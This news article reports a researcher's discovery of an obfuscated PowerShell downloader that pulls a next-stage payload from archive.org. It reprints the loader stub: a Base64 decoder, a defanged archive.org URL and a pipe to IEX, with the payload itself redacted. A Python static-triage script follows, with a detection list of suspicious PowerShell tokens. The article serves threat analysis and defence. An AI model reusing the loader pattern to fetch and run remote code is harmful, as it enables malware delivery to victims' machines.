Beware!! Malicious Content Being Served Via archive.org

A security researcher uncovered a malicious threat being served from archive.org (the Wayback Machine); at the time of writing it was detected by only a limited number of antivirus solutions.

Archive.org, also known as the “Wayback Machine”, lets you travel back to old versions of web pages, since every website on the internet keeps updating to newer versions.

Xavier Mertens (@xme), a Cyber Security Consultant from SANS, uncovered a new PowerShell script that attackers used as a downloader to deliver the next-stage payload with the help of archive.org.

He also found an interesting file, server-lol-123_20210606_meta.xml, that reveals information about the attackers.

There is a directory (server-lol-123_20210606) that contains several files that were uploaded on June 6, 2021.

According to the researcher’s report: “I found a piece of malicious PowerShell that uses archive.org to download the next stage payload. Its score on VT is only 5/58[3] (SHA256:2c661f8145f82a3010e0d5038faab09ea56bf93dd55c1d40f1276c947572597b). The script is quite simple:”

FUNCTION D4FD5C5B9266824C4EEFC83E0C69FD3FAA($D4FD5C5B9266824C4EEFC83E0C69FD3FAAE)
{
  $D4FD5C5B9266824C4EEFC83E0C69FD3FAAx = "Fr"+"omBa"+"se6"+"4Str"+"ing"
  $D4FD5C5B9266824C4EEFC83E0C69FD3FAAG = [Text.Encoding]::Utf8.GetString([Convert]::$D4FD5C5B9266824C4EEFC83E0C69FD3FAAx($D4FD5C5B9266824C4EEFC83E0C69FD3FAAE))
  return $D4FD5C5B9266824C4EEFC83E0C69FD3FAAG
}
$TYFGYTFFFYTFYTFYTFYT = 'hxxps://ia601505[.]us[.]archive[.]org/1/items/server-lol-123_20210606/Server_lol_123.txt'
$JUANADEARCO = 'JEZWWVRGWVRGWUZZRllGWUZHWT0 ... [removed] ... VFJEVAp9CklFWCB2aXA='
$HBAR = D4FD5C5B9266824C4EEFC83E0C69FD3FAA($JUANADEARCO);
$Run=($HBAR -Join '')|I`E`X

The Base64 blob in the script above decodes to more PowerShell code that works as a downloader: once executed, it downloads the next-stage payload from archive.org, writes it to disk, and executes it. The only obfuscation is cosmetic: the method name FromBase64String is split into concatenated string fragments, and Invoke-Expression is hidden behind backticks (I`E`X).
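A script like this can be triaged statically, without ever executing it. The following Python is an added example written for this article; it is not the researcher’s code, and the sample script it analyses is a constructed look-alike with a harmless payload (the real second stage was redacted from the diary). It undoes the two cosmetic tricks seen in the sample (string concatenation hiding FromBase64String, backticks hiding IEX), decodes Base64 literals, refangs and extracts URLs, and flags any host under archive.org. The token list and the length threshold for Base64 candidates are my own choices.

```python
"""Static triage of an obfuscated PowerShell downloader (added example; not the
researcher's or the article's own code). Nothing here executes the script."""
import base64
import re
from urllib.parse import urlparse

# Method / cmdlet names worth flagging once obfuscation is undone (my own list).
SUSPICIOUS_TOKENS = ("FromBase64String", "DownloadString", "DownloadFile",
                     "Invoke-Expression", "IEX")

# Constructed sample that mirrors the structure of the script in the article
# (same tricks, same defanged archive.org URL) but carries a harmless payload.
SAMPLE_INNER_STAGE = "Write-Output 'ok'"
SAMPLE_SCRIPT = f"""FUNCTION D4FD5C5B9266824C4EEFC83E0C69FD3FAA($E)
{{
  $x = "Fr"+"omBa"+"se6"+"4Str"+"ing"
  $G = [Text.Encoding]::Utf8.GetString([Convert]::$x($E))
  return $G
}}
$URL = 'hxxps://ia601505[.]us[.]archive[.]org/1/items/server-lol-123_20210606/Server_lol_123.txt'
$BLOB = '{base64.b64encode(SAMPLE_INNER_STAGE.encode()).decode()}'
$HBAR = D4FD5C5B9266824C4EEFC83E0C69FD3FAA($BLOB);
$Run=($HBAR -Join '')|I`E`X
"""


def join_concatenated_strings(text: str) -> str:
    """Collapse "Fr"+"omBa"+"se6"+"4Str"+"ing" into "FromBase64String" (both quote styles)."""
    for q in ('"', "'"):
        pattern = re.compile(rf"(?:{q}[^{q}]*{q}\s*\+\s*)+{q}[^{q}]*{q}")
        text = pattern.sub(
            lambda m: q + "".join(re.findall(rf"{q}([^{q}]*){q}", m.group(0))) + q, text)
    return text


def strip_backtick_obfuscation(text: str) -> str:
    """Drop backticks wedged between word characters (I`E`X -> IEX).
    Heuristic: real escapes such as `n live inside strings and rarely sit between two letters."""
    return re.sub(r"(?<=\w)`(?=\w)", "", text)


def decode_base64_literals(text: str) -> list[str]:
    """Decode quoted literals of 20+ Base64 characters that yield printable UTF-8 text."""
    found = []
    for lit in re.findall(r"""['"]([A-Za-z0-9+/]{20,}={0,2})['"]""", text):
        try:
            decoded = base64.b64decode(lit, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue
        if all(ch.isprintable() or ch in "\r\n\t" for ch in decoded):
            found.append(decoded)
    return found


def extract_urls(text: str) -> list[str]:
    """Refang hxxp:// and [.] (as used in the diary) and pull out the URLs."""
    refanged = re.sub(r"(?i)hxxp", "http", text).replace("[.]", ".")
    return re.findall(r"""https?://[^\s'"<>]+""", refanged)


def hosted_on_archive_org(url: str) -> bool:
    """True for archive.org itself and any of its subdomains (e.g. ia601505.us.archive.org)."""
    host = (urlparse(url).hostname or "").lower()
    return host == "archive.org" or host.endswith(".archive.org")


def triage(script: str) -> dict:
    """Return the indicators a responder wants: tokens revealed only by
    de-obfuscation, backtick use, URLs, archive.org hosting and decoded payloads."""
    normalized = strip_backtick_obfuscation(join_concatenated_strings(script))
    hidden = [t for t in SUSPICIOUS_TOKENS
              if t.lower() not in script.lower()
              and re.search(rf"\b{re.escape(t)}\b", normalized, re.IGNORECASE)]
    urls = extract_urls(script)
    return {
        "hidden_tokens": hidden,
        "backtick_obfuscation": bool(re.search(r"\w`\w", script)),
        "urls": urls,
        "archive_org_hosted": any(hosted_on_archive_org(u) for u in urls),
        "decoded_payloads": decode_base64_literals(script),
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_SCRIPT).items():
        print(f"{key}: {value}")
```

Because the decoded stage is returned as text rather than piped to an interpreter, the same function can be run over the real blob in a sandbox to recover the downloader’s URL list and the path it writes to disk, which are the indicators worth pushing into proxy and EDR blocklists.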

There is evidence that the attackers are continuously uploading files to archive.org, and, surprisingly, archive.org is a top domain that is usually not blocked or tagged as malicious, which is exactly what makes it attractive as a hosting location.

“That’s the wild Internet today: If you allow users to create an account and upload some data, the chances are big that the feature will be (ab)used to host malicious content.” the researcher said.

Balaji N
BALAJI is an Ex-Security Researcher (Threat Research Labs) at Comodo Cybersecurity. Editor-in-Chief & Co-Founder - Cyber Security News & GBHackers On Security.